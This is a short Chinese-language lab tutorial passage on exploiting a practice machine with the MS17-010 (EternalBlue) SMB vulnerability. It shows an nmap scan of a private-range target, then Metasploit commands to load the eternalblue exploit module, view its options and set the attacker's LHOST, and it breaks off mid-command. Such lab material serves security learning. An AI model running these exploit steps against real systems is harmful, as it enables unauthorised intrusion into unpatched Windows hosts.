第一步:使用Nmap扫描目标主机开放端口
要知道ms17010是对445端口进行攻击的,所以我们要先对目标机进行端口扫描
nmap 192.168.48.110
第二步:获取权限
在这里我们利用ms17010(永恒之蓝)漏洞来获取靶机的权限。
运行msf,使用ms17010漏洞。
msf5 > use exploit/windows/smb/ms17_010_eternalblue
接下来show options查看需要配置的参数
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
剩下的就是需要我们设置LHOST、RHOST、payload,分别是攻击机IP、靶机IP、攻击载荷。
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.48.1 //攻击机ip
lhost =&g